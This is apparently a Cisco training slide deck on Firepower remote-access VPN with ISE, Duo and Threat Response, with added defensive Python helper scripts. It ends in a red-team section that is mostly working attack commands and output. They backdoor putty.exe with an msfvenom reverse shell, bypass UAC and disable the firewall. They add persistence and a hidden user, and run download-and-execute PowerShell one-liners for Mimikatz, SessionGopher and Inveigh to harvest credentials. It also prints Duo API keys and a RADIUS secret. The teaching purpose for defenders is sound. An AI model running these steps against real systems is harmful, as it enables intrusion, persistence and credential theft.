• FTD listens for CoA messages on the selected interface (Inside interface in the screenshot)
• Dynamic Authorization = CoA, together with the Redirect ACL; default port: UDP/1700 (RFC standard: 3799)
ISE and Downloadable ACL, SGT

• dACL:
  • dACL has higher priority
  • Do not expect the URL redirect to help if the dACL drops the traffic
• SGT:
  • SGT assignment to an RAVPN session as a part of the static authorization result was already supported in FTD 6.2.3; FTD 6.3 adds dynamic authorization with CoA
  • There is still an enhancement request for considering the assigned SGT in local policies

Example dACL shown on the slide:
  permit ISE, REMEDIATION, DNS
  permit ICMP
  deny INTERNAL NETWORK
  permit INTERNET
FTD RA VPN with RADIUS CoA / ISE Posture Demo
FTD RA VPN with Duo and RADIUS CoA
RAVPN with Duo and Posture

[Diagram: on premise, FTD VPN sends RADIUS to ISE; ISE sends RADIUS on to the Duo RADIUS Proxy, which authenticates against AD (primary) and the Duo Cloud (secondary)]
Authentication and Authorization Servers

ISE as an Authentication AND Authorization Server
FTD RA VPN with Duo MFA and ISE Posture Demo
RA VPN with Duo and LDAPS
RAVPN with LDAPS

[Diagram: on premise, FTD VPN uses RADIUS to ISE (backed by AD) and LDAPS to the Duo Cloud]
RA VPN Secondary Authentication from 6.4

• Like with ASA, in Connection Profile > AAA tab, option to enable secondary authentication
• It can be either Realm (AD/LDAP) or RADIUS Server Group
• Duo options: push, sms, phone
Username for Secondary Authentication

• Username for the secondary authentication can be provided in one of three ways:
  • Prompt (user should enter the username upon login)
  • Use the username provided in the primary authentication
  • Prefill the username from the client certificate
• You can choose between primary and secondary username as VPN session username
LDAPS as a Realm (For Your Reference)

System > Integration > Realms

• Encryption: LDAPS, then “Test”
• Directory Username, Base DN and Group DN: dc=INTEGRATION_KEY,dc=duosecurity,dc=com
• Directory Password will be the Secret Key.
FTD DNS Configuration (For Your Reference)

• FTD should resolve the duosecurity.com domain itself (for the LDAPS connection), therefore DNS configuration is needed
RA VPN with Certificate and Duo MFA
RAVPN with Certificate and Duo MFA

[Diagram: on premise, FTD VPN sends RADIUS to the Duo RADIUS Proxy, which talks only to the Duo Cloud]
Certificate Based Authentication with Duo

• Authentication: Client AND AAA
• AAA: Duo Auth Proxy
• Prefill username from certificate
• Hide username in login window
Duo RADIUS Proxy – Duo Only Client
A Standalone Duo Software Acting as a RADIUS Server

• [duo_only_client]: there is NO primary authentication
• [radius_server_auto]: secondary authentication with the Duo account in the cloud
• radius_ip_1 / radius_secret_1: FTD as a RADIUS client

  [duo_only_client]

  [radius_server_auto]
  ikey=DIAHEPCGVZFPDLVHH9PL
  skey=g4VC01AqffKnH9pxEwfvg8SFsaBu3ot6FY
  api_host=api-1301c7df.duosecurity.com
  radius_ip_1=198.19.10.1
  radius_secret_1=C1sco12345
  failmode=safe
  client=duo_only_client
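The two authproxy.cfg fragments above (the [ad_client] + [radius_server_auto] proxy and the [duo_only_client] variant) are easy to get subtly wrong. The following Python script is an added example, not Duo's or Cisco's code: it parses a constructed authproxy.cfg with placeholder keys and reports the settings a reviewer should question, in particular failmode=safe, which is Duo's default and lets primary-only logins through while the Duo cloud is unreachable (failmode=secure fails closed). The required-key list and the 16-character secret threshold are this example's own assumptions.

```python
"""Sanity checks for a Duo Authentication Proxy authproxy.cfg before it goes live."""
import configparser

# Constructed sample mirroring the [duo_only_client] layout on the slide.
# ikey/skey/api_host are placeholders, not real Duo credentials.
SAMPLE_CFG = """
[duo_only_client]

[radius_server_auto]
ikey=DIXXXXXXXXXXXXXXXXXX
skey=PLACEHOLDER_SECRET_KEY_PLACEHOLDER_SECRET
api_host=api-xxxxxxxx.duosecurity.com
radius_ip_1=198.19.10.1
radius_secret_1=C1sco12345
failmode=safe
client=duo_only_client
"""

# Assumption of this example: keys every [radius_server_*] section must carry.
REQUIRED_SERVER_KEYS = ("ikey", "skey", "api_host", "radius_ip_1", "radius_secret_1")
PRIMARY_SECTIONS = ("ad_client", "radius_client", "duo_only_client")
MIN_SECRET_LEN = 16  # assumption of this example, not a Duo requirement


def load_authproxy(text):
    # authproxy.cfg is INI-style; interpolation is disabled so '%' in secrets is safe
    parser = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    parser.read_string(text)
    return parser


def audit_authproxy(text):
    """Return a list of (severity, message) findings for the given config text."""
    cfg = load_authproxy(text)
    sections = cfg.sections()
    findings = []

    servers = [s for s in sections if s.startswith("radius_server_")]
    if not servers:
        findings.append(("error", "no [radius_server_*] section: the proxy would not accept RADIUS from FTD"))
    if not any(s in sections for s in PRIMARY_SECTIONS):
        findings.append(("error", "no primary client section: expected [ad_client], [radius_client] or [duo_only_client]"))
    if "duo_only_client" in sections:
        findings.append(("info", "[duo_only_client] performs no primary authentication; "
                                 "the VPN side must authenticate the user itself (client certificate)"))

    for name in servers:
        sec = cfg[name]
        for key in REQUIRED_SERVER_KEYS:
            if not sec.get(key):
                findings.append(("error", f"[{name}] is missing {key}"))
        client = sec.get("client")
        if client and client not in sections:
            findings.append(("error", f"[{name}] client={client} refers to a section that does not exist"))
        # Duo's documented default for failmode is "safe" (fail open), so a missing key counts as safe.
        failmode = (sec.get("failmode") or "safe").lower()
        if failmode != "secure":
            findings.append(("warning", f"[{name}] failmode={failmode}: logins succeed without the second factor "
                                        "while the Duo cloud is unreachable; set failmode=secure to fail closed"))
        if len(sec.get("radius_secret_1") or "") < MIN_SECRET_LEN:
            findings.append(("warning", f"[{name}] radius_secret_1 is shorter than {MIN_SECRET_LEN} characters"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_authproxy(SAMPLE_CFG):
        print(f"{severity:8} {message}")
```

Run it against the real conf\authproxy.cfg by reading the file into a string; the "info" line for [duo_only_client] is expected in the certificate-plus-Duo design above, the two warnings are what should be fixed before the proxy serves production logins.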
FTD RA VPN with Certificate and Duo MFA Demo
Monitoring of RA VPN Connections

• VPN Server side monitoring: show commands

  > show running-config tunnel-group
  tunnel-group DefaultWEBVPNGroup general-attributes
   address-pool VPN-Pool1
   authentication-server-group RADIUS_SERVERS
   authorization-server-group RADIUS_SERVERS
   accounting-server-group RADIUS_SERVERS
  tunnel-group VPN-profile type remote-access
  tunnel-group VPN-profile general-attributes
   address-pool VPN-Pool1
   authentication-server-group RADIUS_SERVERS
   authorization-server-group RADIUS_SERVERS
   accounting-server-group RADIUS_SERVERS
  tunnel-group VPN-profile webvpn-attributes
   group-alias VPN-profile enable

  > show vpn-sessiondb anyconnect
  Session Type: AnyConnect

  Username     : remote1                Index        : 27432
  Assigned IP  : 10.1.1.121             Public IP    : 10.61.97.108
  Protocol     : AnyConnect-Parent SSL-Tunnel DTLS-Tunnel
  License      : AnyConnect Premium
  Encryption   : AnyConnect-Parent: (1)none  SSL-Tunnel: (1)AES-GCM-256  DTLS-Tunnel: (1)AES256
  Hashing      : AnyConnect-Parent: (1)none  SSL-Tunnel: (1)SHA384  DTLS-Tunnel: (1)SHA1
  Bytes Tx     : 31690                  Bytes Rx     : 1
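Both the Group Policy Assignment slide and the monitoring slide above rely on reading show vpn-sessiondb anyconnect by eye. As an added example (not code from the session or from Cisco), the Python below parses that output, using a constructed two-session sample in the same layout, and checks that each tunnel group ended up with the group policy RADIUS was expected to assign through the Class attribute. The expected mapping, user names and addresses are constructed.

```python
"""Parse 'show vpn-sessiondb anyconnect' output and review the group policy each session received."""
import re

# Constructed sample in the same two-column layout the CLI prints (not captured from a device).
SAMPLE_OUTPUT = """\
Session Type: AnyConnect

Username     : remote1                Index        : 27432
Assigned IP  : 10.1.1.121             Public IP    : 10.61.97.108
Protocol     : AnyConnect-Parent SSL-Tunnel DTLS-Tunnel
License      : AnyConnect Premium
Encryption   : AnyConnect-Parent: (1)none  SSL-Tunnel: (1)AES-GCM-256  DTLS-Tunnel: (1)AES256
Hashing      : AnyConnect-Parent: (1)none  SSL-Tunnel: (1)SHA384  DTLS-Tunnel: (1)SHA1
Bytes Tx     : 31690                  Bytes Rx     : 1
Group Policy : DfltGrpPolicy          Tunnel Group : DefaultWEBVPNGroup

Username     : remote2                Index        : 27433
Assigned IP  : 10.1.1.122             Public IP    : 198.51.100.7
Protocol     : AnyConnect-Parent SSL-Tunnel DTLS-Tunnel
Bytes Tx     : 48523                  Bytes Rx     : 23920
Group Policy : SecureGroupPolicy      Tunnel Group : ISE-posture
"""

# Only the fields we care about; a value runs until two or more spaces or end of line,
# so the two-column lines ("Username ... Index ...") yield two matches each.
FIELD_RE = re.compile(
    r"(Username|Index|Assigned IP|Public IP|Protocol|License|Group Policy|Tunnel Group|Bytes Tx|Bytes Rx)"
    r"\s*:\s*(\S+(?: \S+)*?)(?=\s{2,}|$)"
)


def parse_sessiondb(text):
    """Return one dict per session; a new session starts at every 'Username' field."""
    sessions, current = [], None
    for line in text.splitlines():
        for match in FIELD_RE.finditer(line):
            key, value = match.group(1), match.group(2)
            if key == "Username":
                current = {}
                sessions.append(current)
            if current is not None:
                current[key] = value
    return sessions


def review_sessions(sessions, expected_policy_by_group):
    """Flag sessions whose tunnel group or group policy is not what RADIUS should have assigned.

    expected_policy_by_group maps connection profile (tunnel group) -> group policy that the
    RADIUS Class attribute is supposed to deliver; a session on DefaultWEBVPNGroup, or one
    that kept DfltGrpPolicy, means the intended profile or authorization was not applied.
    """
    issues = []
    for session in sessions:
        user = session.get("Username")
        group, policy = session.get("Tunnel Group"), session.get("Group Policy")
        if group not in expected_policy_by_group:
            issues.append((user, f"unexpected tunnel group {group}"))
        elif policy != expected_policy_by_group[group]:
            issues.append((user, f"group policy {policy} instead of {expected_policy_by_group[group]}"))
    return issues


def total_bytes(sessions):
    """Sum of (Bytes Tx, Bytes Rx) over all sessions, for a quick sanity check of traffic volume."""
    tx = sum(int(s.get("Bytes Tx", 0)) for s in sessions)
    rx = sum(int(s.get("Bytes Rx", 0)) for s in sessions)
    return tx, rx


if __name__ == "__main__":
    parsed = parse_sessiondb(SAMPLE_OUTPUT)
    # Constructed expectation: the ISE-posture profile must end up in SecureGroupPolicy.
    for user, problem in review_sessions(parsed, {"ISE-posture": "SecureGroupPolicy"}):
        print(f"{user}: {problem}")
```

In the sample, remote1 landed on DefaultWEBVPNGroup and is reported, which is exactly the case the tunnel-group configuration above makes possible because DefaultWEBVPNGroup also carries an address pool.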
Troubleshooting

Wrongly configured RADIUS Server
RA VPN Summary

• RA VPN
  • It was introduced in version 6.2.2
  • Both IKEv2 and TLS
  • Wizard
• From 6.3:
  • RADIUS timeout (MFA)
  • RADIUS CoA
• From 6.4:
  • Secondary Authentication
• From 6.5:
  • Two-factor authentication using Duo LDAP
Threat Hunting Part I

“The only true wisdom is in knowing you know nothing” - Socrates

• Where to start?
• Which tool(s) to use?
• What information is needed?
• How to connect the dots?

• Today’s Tools
  • Firepower Threat Defense (IPS, AMP)
  • Threat Grid
  • AMP for Endpoints
  • Email Security
  • Threat Response
Threats are becoming more complex...
Understanding what happened requires stitching information together

[Diagram: SecOps asks Why? How? Is it bad? Has it affected us? across the Security Operations technologies and intelligence: Enterprise Firewall, Secure Internet Gateway, Endpoint Security, Network IPS, Web Security, Malware Analytics, Traffic Analytics, Email Security, Identity Context, 3rd party SIEM, 3rd party Sources, Threat Intel]
Introducing Cisco Threat Response (CTR)
Unleashing the power of the Cisco Integrated Security Architecture

• Key pillar of Cisco’s integrated security architecture
• Automates integrations across Cisco security products
• Reduces the time and effort spent on key security operations functions:
  ▪ Detection
  ▪ Investigation
  ▪ Remediation

You’re entitled to Threat Response if you own Firepower Threat Defense, AMP for Endpoints, Threat Grid, Email Security, Umbrella or Stealthwatch
Cisco Threat Response in action
Three simple ways to get started

1. Manual: Investigate (search interface)
2. Casebook via Browser Plug-In
3. High-Fidelity Events -> Incident Manager

Observables: file hash, IP address, domain, URL, email, etc.

Intelligence Sources: Firepower Threat Defense, AMP for Endpoints, Email Security, Stealthwatch, Cisco Umbrella, Talos, Umbrella Investigate, Threat Grid, VirusTotal
• Have we seen these observables? Where?
• Which endpoints connected to the domain/URL?
• Are these observables suspicious or malicious?
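Threat Response’s Investigate page starts by pulling observables out of whatever text is pasted into it. The Python below is an added example of that first step, not Cisco’s code: it extracts the observable types listed above from free text, refangs the usual [.] and hxxp defanging, and skips file names such as putty.exe that would otherwise pass as domains (the extension set is this example’s assumption; a .com file name is deliberately kept, since that is the trick used in the story that follows). The sample text is constructed.

```python
"""Extract CTR-style observables (hashes, IPs, domains, URLs, e-mail addresses) from free text."""
import re

# Refang the common defanging styles used in threat reports before matching.
DEFANG = [
    (re.compile(r"\[\.\]"), "."),
    (re.compile(r"\(\.\)"), "."),
    (re.compile(r"hxxp", re.I), "http"),
]

# URLs and e-mail addresses are matched and blanked out first, so the looser
# hash / IP / domain patterns do not report the same string a second time.
URL_RE = re.compile(r"\bhttps?://[^\s'\"<>]+", re.I)
EMAIL_RE = re.compile(r"\b[\w.+-]+@(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
SHA256_RE = re.compile(r"\b[a-f0-9]{64}\b", re.I)
SHA1_RE = re.compile(r"\b[a-f0-9]{40}\b", re.I)
MD5_RE = re.compile(r"\b[a-f0-9]{32}\b", re.I)
IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)

# Assumption of this example: file names with these extensions are not domains.
# ".com" is intentionally absent so that a file called openme.com is still reported.
FILE_EXTENSIONS = {"exe", "dll", "ps1", "vbs", "bat", "txt", "zip", "pdf", "docx", "xlsx"}

# Constructed sample text (placeholder hash, documentation addresses).
SAMPLE_TEXT = (
    "Alert: host alexa-win10 reached hxxp://cdn[.]example[.]net/update.ps1 and 192.0.2.10:1666.\n"
    "Hash 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef seen on putty.exe;\n"
    "attachment openme.com, mail from bob@example.org."
)


def _add_unique(bucket, value):
    if value.lower() not in (v.lower() for v in bucket):
        bucket.append(value)


def extract_observables(text):
    """Return a dict of observable type -> list of unique values found in text."""
    for pattern, replacement in DEFANG:
        text = pattern.sub(replacement, text)
    found = {"url": [], "email": [], "sha256": [], "sha1": [], "md5": [], "ip": [], "domain": []}

    # Ordered passes: each pass records its matches and blanks them out of the text.
    for kind, pattern in (("url", URL_RE), ("email", EMAIL_RE), ("sha256", SHA256_RE),
                          ("sha1", SHA1_RE), ("md5", MD5_RE), ("ip", IPV4_RE)):
        for match in pattern.finditer(text):
            _add_unique(found[kind], match.group(0))
        text = pattern.sub(" ", text)

    for match in DOMAIN_RE.finditer(text):
        candidate = match.group(0)
        if candidate.rsplit(".", 1)[1].lower() in FILE_EXTENSIONS:
            continue  # looks like a file name, not a host name
        _add_unique(found["domain"], candidate)
    return found


if __name__ == "__main__":
    for kind, values in extract_observables(SAMPLE_TEXT).items():
        if values:
            print(f"{kind:7} {values}")
```

The pass order matters: the URL is removed before the domain pass, so cdn.example.net is reported once as part of the URL, and the SHA-256 is removed before the SHA-1 and MD5 passes so that no 40- or 32-character slice of it is reported as a second hash.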
Integrating FTD and Cisco Threat Response

• Send supported events from FTD devices to CTR for analysis alongside data from your other products and other sources
• Regional Clouds
  • North America
  • Europe
  • Asia (APJC) -> Firepower integration is not currently supported

  Feature                                    Managed by FMC                        Managed by FDM
  Intrusion (IPS) events                     6.3 and later (via syslog)            6.3 and later (via syslog)
                                             6.4 and later (via direct connection) 6.4 and later (via direct connection)
  Connection events (all)                    Not supported                         6.5
  Connection events (high priority only):    6.5                                   Not supported
    Security Intelligence connection events,
    connection events related to file and malware events,
    connection events related to intrusion events
  File and malware events                    6.5                                   6.5
Send Events to the Cloud using Syslog

• Beginning in Firepower release 6.3, you can use syslog to send supported events to the Cisco cloud
• Set up an on-premises Cisco Security Services Proxy (CSSP) server and configure your devices to send syslog messages to this proxy

[Diagram: On Premise: NGFW --syslog--> Cisco Security Services Proxy --https--> Cloud: Security Services Exchange (SSE) --API--> Threat Response]

• NGFW: FTD 6.3, or FTD 6.4 & 6.5 where the unit does not have Internet connectivity
• Cisco Security Services Proxy: virtual machine (ISO image); registers as a SSE device; every 10 minutes forwards the collected events to SSE
• Security Services Exchange: automatically or manually promote incidents
• Threat Response: promoted incidents appear in CTR
Send Events to the Cloud directly

• Beginning in Firepower release 6.4, you can configure your Firepower system to send supported events directly to the Cisco cloud
• Firepower devices send events directly to Security Services Exchange

[Diagram: On Premise: NGFW --https--> Cloud: Security Services Exchange (SSE) --API--> Threat Response]

• NGFW: FTD 6.4 & 6.5 unit that has direct Internet connectivity; registers to SSE as a device by way of Cisco Smart Licensing
• Security Services Exchange: automatically or manually promote incidents
• Threat Response: promoted incidents appear in CTR
One Step to Send Events directly

• IPS, File, Malware and High Priority Connection Events transmitted to the regional cloud
• Regional Cloud Selector and Event Type Selection
• High priority connection events include:
  • Security Intelligence connection events
  • Connection events related to file and malware events
  • Connection events related to intrusion events
Add Firepower Module to CTR

Start with an IPS Event
Do we already know more?

• Source IP: 192.168.249.111
  • Hostname ALEXA-WIN10
  • AMP for Endpoints installed
  • MAC 00:50:56:b8:86:5e
• Destination IP: 31.210.117.131
  • Poor Talos Intelligence reputation score
  • Resolved to 31-210-117-131.turkrdns.com
  • No sighting for the malicious domain
• 2 file hashes connected to the malicious IP
  • 6cf7e427ab52ea95214cbd937a21cd8e8a4e80f1ef2c53cd8cb83c88a5436aee
  • 8ec4b6188a91ad6828e883ed3be9fa5f461d38fcf896f4641833965d1b8b968b

...go down the rabbit hole
…gain more insights

• openme.com connected to the malicious IP on port 1666
  • 6cf7e427ab52ea95214cbd937a21cd8e8a4e80f1ef2c53cd8cb83c88a5436aee
• powershell.exe executed “openme.com” as command
  • C:\Users\Alexa\Downloads\Urgent\openMe.com -A -w1000 31.210.117.131 1666 GET / HTTP/1.1
• explorer.exe executed powershell.exe to run a script
  • C:\Users\Alexa\Documents\DemoTools\IncidentManager\createData.ps1
Find the Origin

Did we solve the riddle?

• Started with an IPS CNC event to a malicious IP
• Endpoint “ALEXA-WIN10” was identified as the source
• IPS event was triggered by an unknown file “openme.com”
• Explorer.exe started PowerShell with a script, which executed “openme.com”
• Email with “openme.com” as attachment was sent to “Alex” corporate email address
• Email was dropped by content filter “Sender Domain Reputation Filtering”

We just started with the investigation, what could be the next steps…
Remediation
Take Response actions with Threat Response

• Block and quarantine a file hash (AMP)
• Block a domain (Umbrella)
• Isolate an affected host (AMP)

Isolate the Endpoint with a single “click”

Block incoming and outgoing network activity
TALOS Incident Response Services

• Emergency response
  • For incidents such as data breaches or ransomware, we quickly address the most pressing concerns. We build a plan to isolate the attacker, scope out and contain the situation, identify the root cause, and design strategies to remedy the underlying issues.
• Retainer
  • With your retainer, our team is available even before an incident, with proactive services to strengthen your security posture. If you do require emergency assistance, our responders are available within hours to begin work virtually before they travel onsite.
• Proactive services
  • Don't wait for an incident to occur to take action: identify vulnerabilities before they impact your organization. Our responders will work with your team to hunt for and address existing adversaries within your network.
...and the Story continues… (For Your Reference)

There was an additional unknown file hash: 8ec4b6188a91ad6828e883ed3be9fa5f461d38fcf896f4641833965d1b8b968b

• Outgoing connection from “midyearbonus.exe”
• Why two different hashes for “explorer.exe”?
Threat Hunting Part II
Talk To The “Red Team” And Learn From Them!

[Diagram: RED TEAM (Offensive Security), PURPLE TEAM, BLUE TEAM (Defensive Security)]

Who Is Who In Our Story

ATTACKER, VICTIM, DEFENDER
Mapping to Cyber Kill Chain (For Your Reference)

Attacker step per phase (top row of the slide) and defender control (bottom row), reconstructed from the slide layout:

• Recon: threat intelligence
• Stage: payload, C&C server
• Deliver: email the payload! / email security
• Exploit: ask the user nicely to click on it / Endpoint: exploit prevention, retrospection, system protection, user education*
• Install: privilege escalation, firewall off / Cloud IOCs, splunk
• C&C: backdoor, add user, schtasks / snort rule
• Pivot: sessiongopher, responder / cloud IOCs, TCP View, Stealthwatch, Process explorer
Firepower Integrations
FMC & FTD APIs And Integration Points
https://www.cisco.com/c/m/en_us/products/security/technical-alliance-partners.html

[Diagram: FMC (host and event database) and FTD with their integration points]

• Host input: Qualys, Rapid 7, Tenable, Greenbone
• Threat Intelligence Director (TID): ThreatQ, Hail a TAXII, Anomali, Seclytics, NC4, McAfee
• eStreamer (SIEM): Insight, IBM QRadar, Splunk, LogRhythm, LogZilla, Arcsight
• DB access and FMC REST API (Security and Policy Orchestration): Tufin, Firemon, Panaseer, Algosec, MicroFocus (Arcsight), Firesec, Crystal Report
• FTD API: Ansible
FMC Configuration
eStreamer

• Stream events (intrusion, discovery, connection etc.) to a client application
• FMC is the eStreamer server, the client is e.g. the Splunk eNcore APP
• Client requests compact, binary encoded messages – high performance
• Communication is TCP based and secure (port 8302)
FMC Configuration
System → Integration → eStreamer

1. Select the events
2. Pick any password, just remember it
3. Hostname/IP of the eStreamer client

Download the certificate and upload it to Splunk. Rename the file to “client.pkcs12”
Splunk Installation
Cisco Firepower APP for Splunk
Detailed configuration

1. Have a fresh CentOS (or other Linux distribution) installation
2. Download Splunk (supported versions 7.3 – 7.2 – 7.1 - 7.0)
3. Install Splunk
4. Download and set up the “Cisco eStreamer eNcore Add-on for Splunk” APP for Splunk
5. Configure eStreamer on the FMC
6. Optionally install “Cisco Firepower App for Splunk”. It provides a number of dashboards
Firepower APP for Splunk

Search for “Cisco Firepower App for Splunk” and install it (For Your Reference)

IPS Events Summary (For Your Reference)

Scroll Down For The IPS Events (For Your Reference): click to get event details

Raw IPS Event (For Your Reference): Source IP, Event description, Destination port, Sensor IP, Matches ACP, Event message
I Need To Find Only One Vulnerability…
Find a Popular Application

• Download our favorite SSH client: putty.exe

  tecsec2600# wget https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

• Let's calculate SHA256

  tecsec2600# sha256sum putty.exe
  736330aaa3a4683d3cc866153510763351a60062a236d22b12f4fe0f10853582  putty.exe
Modify putty.exe, Just A Little Bit

• If the user starts the application, it will open a backdoor connection to 192.168.77.77

  tecsec2600# msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.77.77 lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00\xFF" -f exe -o puttyLIVE.exe

  (callouts on the slide: Payload = -p, Encoder = -e, Bad characters = -b, Output file = -o)

• SHA256 looks different

  tecsec2600# sha256sum putty*
  736330aaa3a4683d3cc866153510763351a60062a236d22b12f4fe0f10853582  putty.exe
  b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38  puttyLIVE.exe
No Match On Virustotal

...nor In The Talos Database
On the Attacker Machine

• A simple configuration file

  root@red-kali:~/tecsec2600# cat revers.sh
  use multi/handler
  set PAYLOAD windows/meterpreter/reverse_tcp
  set LHOST 192.168.77.77
  set LPORT 4444
  run -j

• Start listening for those incoming connections

  tecsec2600# msfconsole -r revers.sh
  [*] Exploit completed, but no session was created.
  [*] Started reverse TCP handler on 192.168.77.77:4444
Send The File Via Email

• Spoofing the sender
• Multiple recipients
• Attachment
• Create your own “story”

Victim Opens The Mail
Cisco ESA – subject prepended

...Saves Attachment To The Desktop

...And Finally Clicks On It And Connects To Some Server
Reverse Shell Arrived

  msf5 exploit(multi/handler) > [*] Sending stage (180291 bytes) to 192.168.34.34
  [*] Meterpreter session 1 opened (192.168.77.77:4444 -> 192.168.34.34:50828)

  (192.168.34.34 is the victim’s IP)

  msf5 exploit(multi/handler) > sessions -l

  Active sessions
  ===============
    Id  Name  Type                     Information                          Connection
    --  ----  ----                     -----------                          ----------
    1         meterpreter x86/windows  client34-PC\client34 @ CLIENT34-PC   192.168.77.77:4444 -> 192.168.34.34:50828 (192.168.34.34)

  (Information column: PC/username)
Let’s See Where We Have Landed

  msf5 exploit(multi/handler) > sessions -i 1        (interact with session 1)
  [*] Starting interaction with 1...

  meterpreter > sysinfo
  Computer        : CLIENT34-PC
  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
  Architecture    : x64
  System Language : en_US
  Meterpreter     : x86/windows

  meterpreter > getuid
  Server username: client34-PC\client34        (non-privileged access)
List The Items On The Desktop

  meterpreter > shell
  Process 2504 created.
  Channel 1 created.
  Microsoft Windows [Version 6.1.7601]

  C:\Users\client34\Desktop>

  C:\Users\client34\Desktop>dir        (this is “cmd.exe”, run any command you like)

   Directory of C:\Users\client34\Desktop

  01/11/2020  11:20 PM         1,425,408 puttyLIVE.exe
                 1 File(s)      1,425,408 bytes
Turn Off The Windows Firewall

  C:\Users\client34\Desktop>netsh advfirewall set allprofile state off
  netsh advfirewall set allprofile state off

  The requested operation requires elevation (Run as administrator).
Process Migration

Find a known process. Try out to move to your AV process ☺

  meterpreter > execute -f notepad.exe

  meterpreter > ps | grep notepad.exe
  Filtering on 'notepad.exe'

  Process List
  ============
   PID   PPID  Name         Arch  Session  User                  Path
   ---   ----  ----         ----  -------  ----                  ----
   2436  1296  notepad.exe  x86   1        client34-PC\client34  C:\Windows\SysWOW64\notepad.exe

  meterpreter > migrate 2436
  [*] Migrating from 1296 to 2436...
  [*] Migration completed successfully.
Privilege escalation

1. Before

  meterpreter > getuid
  Server username: client34-PC\client34

  msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac
  msf5 exploit(windows/local/bypassuac) > set session 1
  msf5 exploit(windows/local/bypassuac) > set lport 5555
  msf5 exploit(windows/local/bypassuac) > run

  [*] Started reverse TCP handler on 192.168.77.77:5555
  [+] BypassUAC can bypass this setting, continuing...        (Bypassing UAC)
  [+] Part of Administrators group! Continuing...
  [*] Uploading the bypass UAC executable to the filesystem...
  [*] Sending stage (180291 bytes) to 192.168.34.34
  [*] Meterpreter session 2 opened (192.168.77.77:5555 -> 192.168.34.34:50887)

  meterpreter > getsystem
  ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

2. After

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
Let’s Try To Turn Off Windows Firewall, again! ☺

  meterpreter > shell

  C:\Windows\system32>netsh advfirewall set allprofile state off
  Ok.
Schedule A Powershell Script To Run

  schtasks /create /tn "checkNET" /sc minute /mo 5 /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -File C:\Users\client34\Downloads\checknetICMP.ps1"

  (callouts on the slide: Name = /tn, run it every 5 min = /sc minute /mo 5, use PowerShell to run the script = /tr)
Persistence Connection

  meterpreter > run persistence -A -L c:\\ -X 30 -p 6666 -r 192.168.77.77        (-p: port to connect)

  [*] Running Persistence Script
  [*] Resource file for cleanup created at /root/.msf4/logs/persistence/CLIENT34-PC_20200111.1833/CLIENT34-PC_20200111.1833.rc
  [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.77.77 LPORT=6666
  [+] Persistent Script written to c:\\NvdcOgvELQso.vbs        (drop a script)
  [*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
  [*] Executing script c:\\NvdcOgvELQso.vbs        (execute it)
  [+] Agent executed with PID 4388
  [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ghMHVLHJj        (registry entry)
  [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ghMHVLHJj
  meterpreter > [*] Meterpreter session 3 opened (192.168.77.77:6666 -> 192.168.34.34:50914)
All Three “meterpreter” Sessions

  meterpreter > background
  [*] Backgrounding session 2...
  msf5 exploit(windows/local/bypassuac) > sessions -l

  Active sessions
  ===============
    Id  Name  Type                     Information                          Connection
    --  ----  ----                     -----------                          ----------
    1         meterpreter x86/windows  client34-PC\client34 @ CLIENT34-PC   192.168.77.77:4444 -> 192.168.34.34:50849
    2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ CLIENT34-PC    192.168.77.77:5555 -> 192.168.34.34:50887        (this one is privileged)
    3         meterpreter x86/windows  client34-PC\client34 @ CLIENT34-PC   192.168.77.77:6666 -> 192.168.34.34:50914
Yet Another “Persistent Connection”

  C:\Windows\system32>net1 user databasebackup secretpass1 /add
  net1 user databasebackup secretpass1 /add
  The command completed successfully.

Who dares to delete a “backup” user?
The Good Old “mimikatz”
No touch on the disk, directly to the memory

  C:\Windows\system32>Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

(callouts on the slide output: “As good as password”, “Password”)
Let’s Find The Next Victim
PowerShell script downloaded from the internet

  C:\Windows\system32>Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/fireeye/SessionGopher/master/SessionGopher.ps1'); Invoke-SessionGopher

  [+] Digging on client34-PC ...

  Microsoft Remote Desktop (RDP) Sessions        (digging for saved RDP sessions)

  Source   : client34-PC\client34
  Hostname : mrorange.budlab.net
  Username : budlab.net\mrorange

  WinSCP Sessions        (digging for saved WinSCP sessions)

  Source   : client34-PC\client34
  Session  : [email protected]
  Hostname : mrblue.budlab.net
  Username : mrblue
  Password : rainbow

  Source   : client34-PC\client34
  Session  : [email protected]
  Hostname : mrbrown.budlab.net
  Username : mrbrown
  Password : rainbow
Or Simply Ask For The Password

C:\Windows\system32>Powershell.exe -NoP -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -HTTP Y -HTTPS Y -mDNS Y -NBNS Y -Proxy Y -WPADAuth Basic -HTTPAuth Basic

Callout: “Respond to those queries”
Once You Are In, I Need Just One IOC To Catch You!

If You Had Watched the Live Mail Logs… (highly unlikely)
Cisco Email Security Appliance “mail_logs”

Callouts: Message ID (MID); sender and recipient domains are the same; unknown file, sending for analysis

